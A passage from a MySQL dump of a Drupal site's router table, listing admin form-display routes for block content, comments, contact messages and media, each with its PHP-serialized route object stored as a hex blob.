('entity.entity_form_display.block_content.form_mode', '/admin/structure/block-content/manage/{block_content_type}/form-display/{form_mode_name}', '/admin/structure/block-content/manage/%/form-display/%', 122, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a38383a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e742f6d616e6167652f7b626c6f636b5f636f6e74656e745f747970657d2f666f726d2d646973706c61792f7b666f726d5f6d6f64655f6e616d657d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a31323a225f656e746974795f666f726d223b733a32343a22656e746974795f666f726d5f646973706c61792e65646974223b733a363a225f7469746c65223b733a31393a224d616e61676520666f726d20646973706c6179223b733a31343a22656e746974795f747970655f6964223b733a31333a22626c6f636b5f636f6e74656e74223b733a363a2262756e646c65223b733a303a22223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a32363a225f6669656c645f75695f666f726d5f6d6f64655f616363657373223b733a33373a2261646d696e697374657220626c6f636b5f636f6e74656e7420666f726d20646973706c6179223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31383a22626c6f636b5f636f6e74656e745f74797065223b613a323a7b733a343a2274797065223b733a32353a22656e746974793a626c6f636b5f636f6e74656e745f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a393a225f6669656c645f7569223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33313a226163636573735f636865636b2e6669656c645f75692e666f726d5f6d6f6465223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a313b733a31343a22666f726d5f6d6f64655f6e616d65223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3131373a227b5e2f61646d696e2f7374727563747572652f626c6f636b5c2d636f6e74656e742f6d616e6167652f283f503c626c6f636b5f636f6e74656e745f747970653e5b5e2f5d2b2b292f666f726d5c2d646973706c61792f283f503c666f726d5f6d6f64655f6e616d653e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a343a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31343a22666f726d5f6d6f64655f6e616d65223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a31333a222f666f726d2d646973706c6179223b7d693a323b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a343b623a313b7d693a333b613a323a7b693a303b733a343a2274657874223b693a313b733a33373a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a313b733a31343a22666f726d5f6d6f64655f6e616d65223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132323b733a31343a227061747465726e4f75746c696e65223b733a35343a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e742f6d616e6167652f252f666f726d2d646973706c61792f25223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('entity.entity_form_display.block_content.form_mode.bc', '/admin/structure/block/block-content/manage/{block_content_type}/form-display/{form_mode_name}', '/admin/structure/block/block-content/manage/%/form-display/%', 250, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a39343a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f6d616e6167652f7b626c6f636b5f636f6e74656e745f747970657d2f666f726d2d646973706c61792f7b666f726d5f6d6f64655f6e616d657d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a363a225f7469746c65223b733a31393a224d616e61676520666f726d20646973706c6179223b733a31343a22656e746974795f747970655f6964223b733a31333a22626c6f636b5f636f6e74656e74223b733a363a2262756e646c65223b733a303a22223b733a31313a225f636f6e74726f6c6c6572223b733a38313a225c44727570616c5c626c6f636b5f636f6e74656e745c436f6e74726f6c6c65725c426c6f636b436f6e74656e74436f6e74726f6c6c65723a3a626c6f636b436f6e74656e74547970655265646972656374223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a32363a225f6669656c645f75695f666f726d5f6d6f64655f616363657373223b733a33373a2261646d696e697374657220626c6f636b5f636f6e74656e7420666f726d20646973706c6179223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31383a22626c6f636b5f636f6e74656e745f74797065223b613a323a7b733a343a2274797065223b733a32353a22656e746974793a626c6f636b5f636f6e74656e745f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a393a225f6669656c645f7569223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33313a226163636573735f636865636b2e6669656c645f75692e666f726d5f6d6f6465223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a313b733a31343a22666f726d5f6d6f64655f6e616d65223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3132333a227b5e2f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b5c2d636f6e74656e742f6d616e6167652f283f503c626c6f636b5f636f6e74656e745f747970653e5b5e2f5d2b2b292f666f726d5c2d646973706c61792f283f503c666f726d5f6d6f64655f6e616d653e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a343a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31343a22666f726d5f6d6f64655f6e616d65223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a31333a222f666f726d2d646973706c6179223b7d693a323b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a343b623a313b7d693a333b613a323a7b693a303b733a343a2274657874223b693a313b733a34333a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a313b733a31343a22666f726d5f6d6f64655f6e616d65223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3235303b733a31343a227061747465726e4f75746c696e65223b733a36303a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f6d616e6167652f252f666f726d2d646973706c61792f25223b733a383a226e756d5061727473223b693a383b7d7d, 8),
('entity.entity_form_display.comment.default', '/admin/structure/comment/manage/{comment_type}/form-display', '/admin/structure/comment/manage/%/form-display', 61, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35393a222f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e6167652f7b636f6d6d656e745f747970657d2f666f726d2d646973706c6179223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a353a7b733a31323a225f656e746974795f666f726d223b733a32343a22656e746974795f666f726d5f646973706c61792e65646974223b733a363a225f7469746c65223b733a31393a224d616e61676520666f726d20646973706c6179223b733a31343a22666f726d5f6d6f64655f6e616d65223b733a373a2264656661756c74223b733a31343a22656e746974795f747970655f6964223b733a373a22636f6d6d656e74223b733a363a2262756e646c65223b733a303a22223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a32363a225f6669656c645f75695f666f726d5f6d6f64655f616363657373223b733a33313a2261646d696e697374657220636f6d6d656e7420666f726d20646973706c6179223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31323a22636f6d6d656e745f74797065223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a636f6d6d656e745f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a393a225f6669656c645f7569223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33313a226163636573735f636865636b2e6669656c645f75692e666f726d5f6d6f6465223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31323a22636f6d6d656e745f74797065223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37373a227b5e2f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e6167652f283f503c636f6d6d656e745f747970653e5b5e2f5d2b2b292f666f726d5c2d646973706c6179247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31333a222f666f726d2d646973706c6179223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a22636f6d6d656e745f74797065223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a33313a222f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31323a22636f6d6d656e745f74797065223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36313b733a31343a227061747465726e4f75746c696e65223b733a34363a222f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e6167652f252f666f726d2d646973706c6179223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.entity_form_display.comment.form_mode', '/admin/structure/comment/manage/{comment_type}/form-display/{form_mode_name}', '/admin/structure/comment/manage/%/form-display/%', 122, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a37363a222f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e6167652f7b636f6d6d656e745f747970657d2f666f726d2d646973706c61792f7b666f726d5f6d6f64655f6e616d657d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a31323a225f656e746974795f666f726d223b733a32343a22656e746974795f666f726d5f646973706c61792e65646974223b733a363a225f7469746c65223b733a31393a224d616e61676520666f726d20646973706c6179223b733a31343a22656e746974795f747970655f6964223b733a373a22636f6d6d656e74223b733a363a2262756e646c65223b733a303a22223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a32363a225f6669656c645f75695f666f726d5f6d6f64655f616363657373223b733a33313a2261646d696e697374657220636f6d6d656e7420666f726d20646973706c6179223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31323a22636f6d6d656e745f74797065223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a636f6d6d656e745f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a393a225f6669656c645f7569223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33313a226163636573735f636865636b2e6669656c645f75692e666f726d5f6d6f6465223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31323a22636f6d6d656e745f74797065223b693a313b733a31343a22666f726d5f6d6f64655f6e616d65223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3130343a227b5e2f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e6167652f283f503c636f6d6d656e745f747970653e5b5e2f5d2b2b292f666f726d5c2d646973706c61792f283f503c666f726d5f6d6f64655f6e616d653e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a343a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31343a22666f726d5f6d6f64655f6e616d65223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a31333a222f666f726d2d646973706c6179223b7d693a323b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a22636f6d6d656e745f74797065223b693a343b623a313b7d693a333b613a323a7b693a303b733a343a2274657874223b693a313b733a33313a222f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31323a22636f6d6d656e745f74797065223b693a313b733a31343a22666f726d5f6d6f64655f6e616d65223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132323b733a31343a227061747465726e4f75746c696e65223b733a34383a222f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e6167652f252f666f726d2d646973706c61792f25223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('entity.entity_form_display.contact_message.default', '/admin/structure/contact/manage/{contact_form}/form-display', '/admin/structure/contact/manage/%/form-display', 61, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35393a222f61646d696e2f7374727563747572652f636f6e746163742f6d616e6167652f7b636f6e746163745f666f726d7d2f666f726d2d646973706c6179223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a353a7b733a31323a225f656e746974795f666f726d223b733a32343a22656e746974795f666f726d5f646973706c61792e65646974223b733a363a225f7469746c65223b733a31393a224d616e61676520666f726d20646973706c6179223b733a31343a22666f726d5f6d6f64655f6e616d65223b733a373a2264656661756c74223b733a31343a22656e746974795f747970655f6964223b733a31353a22636f6e746163745f6d657373616765223b733a363a2262756e646c65223b733a303a22223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a32363a225f6669656c645f75695f666f726d5f6d6f64655f616363657373223b733a33393a2261646d696e697374657220636f6e746163745f6d65737361676520666f726d20646973706c6179223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31323a22636f6e746163745f666f726d223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a636f6e746163745f666f726d223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a393a225f6669656c645f7569223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33313a226163636573735f636865636b2e6669656c645f75692e666f726d5f6d6f6465223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31323a22636f6e746163745f666f726d223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37373a227b5e2f61646d696e2f7374727563747572652f636f6e746163742f6d616e6167652f283f503c636f6e746163745f666f726d3e5b5e2f5d2b2b292f666f726d5c2d646973706c6179247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31333a222f666f726d2d646973706c6179223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a22636f6e746163745f666f726d223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a33313a222f61646d696e2f7374727563747572652f636f6e746163742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31323a22636f6e746163745f666f726d223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36313b733a31343a227061747465726e4f75746c696e65223b733a34363a222f61646d696e2f7374727563747572652f636f6e746163742f6d616e6167652f252f666f726d2d646973706c6179223b733a383a226e756d5061727473223b693a363b7d7d, 6);
INSERT INTO `router` (`name`, `path`, `pattern_outline`, `fit`, `route`, `number_parts`) VALUES
('entity.entity_form_display.contact_message.form_mode', '/admin/structure/contact/manage/{contact_form}/form-display/{form_mode_name}', '/admin/structure/contact/manage/%/form-display/%', 122, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a37363a222f61646d696e2f7374727563747572652f636f6e746163742f6d616e6167652f7b636f6e746163745f666f726d7d2f666f726d2d646973706c61792f7b666f726d5f6d6f64655f6e616d657d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a31323a225f656e746974795f666f726d223b733a32343a22656e746974795f666f726d5f646973706c61792e65646974223b733a363a225f7469746c65223b733a31393a224d616e61676520666f726d20646973706c6179223b733a31343a22656e746974795f747970655f6964223b733a31353a22636f6e746163745f6d657373616765223b733a363a2262756e646c65223b733a303a22223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a32363a225f6669656c645f75695f666f726d5f6d6f64655f616363657373223b733a33393a2261646d696e697374657220636f6e746163745f6d65737361676520666f726d20646973706c6179223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31323a22636f6e746163745f666f726d223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a636f6e746163745f666f726d223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a393a225f6669656c645f7569223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33313a226163636573735f636865636b2e6669656c645f75692e666f726d5f6d6f6465223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31323a22636f6e746163745f666f726d223b693a313b733a31343a22666f726d5f6d6f64655f6e616d65223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3130343a227b5e2f61646d696e2f7374727563747572652f636f6e746163742f6d616e6167652f283f503c636f6e746163745f666f726d3e5b5e2f5d2b2b292f666f726d5c2d646973706c61792f283f503c666f726d5f6d6f64655f6e616d653e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a343a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31343a22666f726d5f6d6f64655f6e616d65223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a31333a222f666f726d2d646973706c6179223b7d693a323b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a22636f6e746163745f666f726d223b693a343b623a313b7d693a333b613a323a7b693a303b733a343a2274657874223b693a313b733a33313a222f61646d696e2f7374727563747572652f636f6e746163742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31323a22636f6e746163745f666f726d223b693a313b733a31343a22666f726d5f6d6f64655f6e616d65223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132323b733a31343a227061747465726e4f75746c696e65223b733a34383a222f61646d696e2f7374727563747572652f636f6e746163742f6d616e6167652f252f666f726d2d646973706c61792f25223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('entity.entity_form_display.media.default', '/admin/structure/media/manage/{media_type}/form-display', '/admin/structure/media/manage/%/form-display', 61, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35353a222f61646d696e2f7374727563747572652f6d656469612f6d616e6167652f7b6d656469615f747970657d2f666f726d2d646973706c6179223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a353a7b733a31323a225f656e746974795f666f726d223b733a32343a22656e746974795f666f726d5f646973706c61792e65646974223b733a363a225f7469746c65223b733a31393a224d616e61676520666f726d20646973706c6179223b733a31343a22666f726d5f6d6f64655f6e616d65223b733a373a2264656661756c74223b733a31343a22656e746974795f747970655f6964223b733a353a226d65646961223b733a363a2262756e646c65223b733a303a22223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a32363a225f6669656c645f75695f666f726d5f6d6f64655f616363657373223b733a32393a2261646d696e6973746572206d6564696120666f726d20646973706c6179223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31303a226d656469615f74797065223b613a323a7b733a343a2274797065223b733a31373a22656e746974793a6d656469615f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a393a225f6669656c645f7569223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33313a226163636573735f636865636b2e6669656c645f75692e666f726d5f6d6f6465223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31303a226d656469615f74797065223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37333a227b5e2f61646d696e2f7374727563747572652f6d656469612f6d616e6167652f283f503c6d656469615f747970653e5b5e2f5d2b2b292f666f726d5c2d646973706c6179247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31333a222f666f726d2d646973706c6179223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31303a226d656469615f74797065223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a32393a222f61646d696e2f7374727563747572652f6d656469612f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31303a226d656469615f74797065223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36313b733a31343a227061747465726e4f75746c696e65223b733a34343a222f61646d696e2f7374727563747572652f6d656469612f6d616e6167652f252f666f726d2d646973706c6179223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.entity_form_display.media.form_mode', '/admin/structure/media/manage/{media_type}/form-display/{form_mode_name}', '/admin/structure/media/manage/%/form-display/%', 122, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a37323a222f61646d696e2f7374727563747572652f6d656469612f6d616e6167652f7b6d656469615f747970657d2f666f726d2d646973706c61792f7b666f726d5f6d6f64655f6e616d657d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a31323a225f656e746974795f666f726d223b733a32343a22656e746974795f666f726d5f646973706c61792e65646974223b733a363a225f7469746c65223b733a31393a224d616e61676520666f726d20646973706c6179223b733a31343a22656e746974795f747970655f6964223b733a353a226d65646961223b733a363a2262756e646c65223b733a303a22223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a32363a225f6669656c645f75695f666f726d5f6d6f64655f616363657373223b733a32393a2261646d696e6973746572206d6564696120666f726d20646973706c6179223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31303a226d656469615f74797065223b613a323a7b733a343a2274797065223b733a31373a22656e746974793a6d656469615f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a393a225f6669656c645f7569223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33313a226163636573735f636865636b2e6669656c645f75692e666f726d5f6d6f6465223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31303a226d656469615f74797065223b693a313b733a31343a22666f726d5f6d6f64655f6e616d65223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3130303a227b5e2f61646d696e2f7374727563747572652f6d656469612f6d616e6167652f283f503c6d656469615f747970653e5b5e2f5d2b2b292f666f726d5c2d646973706c61792f283f503c666f726d5f6d6f64655f6e616d653e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a343a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31343a22666f726d5f6d6f64655f6e616d65223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a31333a222f666f726d2d646973706c6179223b7d693a323b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31303a226d656469615f74797065223b693a343b623a313b7d693a333b613a323a7b693a303b733a343a2274657874223b693a313b733a32393a222f61646d696e2f7374727563747572652f6d656469612f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31303a226d656469615f74797065223b693a313b733a31343a22666f726d5f6d6f64655f6e616d65223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132323b733a31343a227061747465726e4f75746c696e65223b733a34363a222f61646d696e2f7374727563747572652f6d656469612f6d616e6167652f252f666f726d2d646973706c61792f25223b733a383a226e756d5061727473223b693a373b7d7d, 7),
